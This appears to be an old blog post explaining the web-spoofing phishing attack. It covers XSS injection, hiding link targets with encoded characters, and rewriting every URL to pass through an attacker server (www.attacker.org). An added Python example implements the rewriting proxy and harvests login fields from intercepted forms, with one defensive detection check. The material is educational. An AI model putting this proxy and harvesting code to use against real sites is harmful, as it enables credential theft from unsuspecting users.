Sunday, November 1, 2009

How the Web Spoofing Attack Works

URL Rewriting

STEP I
# A phisher could insert a malicious script inside a product review (or any other user-supplied content that the host site displays to other visitors) to attack the user.

# The script modifies the host site's page in the victim's browser so that the user believes he or she is interacting with the genuine, secure site. This technique is called "Cross-Site Scripting" (XSS).

STEP II
# This is done by using encoded characters to hide the destination address of a link. For example, the HTML numeric character references &#97;&#98;&#99; render as "abc", so a link target spelled out in such references is hard to read in the page source even though the browser resolves it to the attacker's address.

# Assuming the attacker's server is on the machine www.attacker.org, the attacker rewrites a URL by adding http://www.attacker.org to the front of it, using JavaScript (the same script can also keep the rewritten address out of the browser's status line, so the victim sees nothing unusual).
For example,
http://home.netscape.com becomes http://www.attacker.org/http://home.netscape.com.

STEP III
# Once the attacker's server has fetched the real document needed to satisfy the request, it rewrites all of the URLs in that document in the same way (links, image sources and form actions, with relative URLs resolved against the real page first). Then the attacker's server provides the rewritten page to the victim's browser.

# If the victim follows any link on the new page, the request again goes to the attacker's server rather than to the real site, so the victim remains trapped in the attacker's false web.

Forms 

When the victim submits a form, the submitted data goes to the attacker's server, because the form's action URL was rewritten along with the links. The attacker's server can observe and even modify the submitted data, doing whatever malicious editing is desired, before passing it on to the real server; the real server sees a normal-looking request and the victim sees the expected response.
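The three rewriting steps and the form interception above, carried through end to end as an added example (this is not code from the original post or from the web-spoofing paper it summarises). The attacker origin http://www.attacker.org and the home.netscape.com target are taken from the text; the sample HTML page, the fake fetcher and all function names are constructed assumptions, and nothing here touches the network. The last function goes beyond the post and shows the defensive check the rewritten-URL shape makes possible: a URL whose path carries a second scheme and host.

```python
"""Web-spoofing URL rewriting: an attacker's proxy prefixes every URL in a
fetched page with its own origin, so every link and form submission from
the victim passes through the attacker (STEP II, STEP III and Forms above).

Constructed example: ATTACKER is the origin named in the text; SAMPLE_PAGE
is a made-up page standing in for the real site's HTML.
"""
import re
from urllib.parse import urljoin, urlsplit, parse_qs

ATTACKER = "http://www.attacker.org/"   # attacker's server, as in the text

# href=, src= and action= attribute values in single or double quotes
_ATTR = re.compile(r"""(?i)\b(href|src|action)(\s*=\s*)(["'])(.*?)\3""", re.S)

# Constructed stand-in for a page served by the real site.
SAMPLE_PAGE = """<html><body>
<a href="products.html">Products</a>
<a href="http://home.netscape.com/login">Log in</a>
<img src="/images/logo.gif">
<form action="/cgi-bin/login" method="get">
  <input name="user"><input name="pass" type="password">
</form>
<a href="#top">Top</a>
</body></html>"""


def wrap(url: str) -> str:
    """STEP II: rewrite one absolute URL into the attacker's false web."""
    return ATTACKER + url


def unwrap(rewritten: str) -> str:
    """Server side: recover the real URL the attacker's server must fetch."""
    if not rewritten.startswith(ATTACKER):
        raise ValueError("not a rewritten URL")
    return rewritten[len(ATTACKER):]


def rewrite_document(html: str, page_url: str) -> str:
    """STEP III: rewrite every link, image/script source and form action.

    Relative URLs are resolved against the real page's URL first, so the
    victim's browser never receives a reference that escapes the proxy.
    Fragment-only, javascript:, mailto: and data: targets are left alone.
    """
    def repl(m):
        attr, eq, quote, value = m.groups()
        value = value.strip()
        if value.lower().startswith(("#", "javascript:", "mailto:", "data:")):
            return m.group(0)          # nothing for the proxy to fetch
        return f"{attr}{eq}{quote}{wrap(urljoin(page_url, value))}{quote}"
    return _ATTR.sub(repl, html)


def serve_rewritten(request_url: str, fetch) -> str:
    """What the attacker's server does per request: fetch the real page
    (fetch is any callable taking a URL, here a dict lookup) and rewrite it."""
    real = unwrap(request_url)
    return rewrite_document(fetch(real), real)


def intercept_form(submitted_url: str) -> tuple:
    """Forms: when a rewritten GET form is submitted, the attacker's server
    sees the real target and every field value before forwarding them."""
    real = unwrap(submitted_url)
    fields = {k: v[0] for k, v in parse_qs(urlsplit(real).query).items()}
    return real, fields


def looks_rewritten(url: str) -> bool:
    """Defensive check (not in the post): a URL whose *path* contains a second
    scheme://host is the shape STEP II produces and is worth flagging."""
    return re.search(r"(?i)/https?:/", urlsplit(url).path) is not None


if __name__ == "__main__":
    fake_site = {"http://home.netscape.com/index.html": SAMPLE_PAGE}
    print(serve_rewritten(wrap("http://home.netscape.com/index.html"),
                          fake_site.__getitem__))
    print(intercept_form(wrap("http://home.netscape.com/cgi-bin/login"
                              "?user=alice&pass=s3cret")))
```

Run as a script it prints the rewritten page, in which every href, src and action now begins with http://www.attacker.org/, followed by the credentials the attacker's server would harvest from the login form. The regex-over-attributes approach is deliberately simple; a real proxy would also have to rewrite URLs inside CSS, scripts and meta refreshes, which is exactly why JavaScript-heavy pages made the original attack harder to sustain.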

1. A deceptive message is sent from the phisher to the user.
2. A user provides confidential information to a phishing server (normally after some interaction with the server).
3. The phisher obtains the confidential information from the server.
4. The confidential information is used to impersonate the user.
5. The phisher obtains illicit monetary gain.
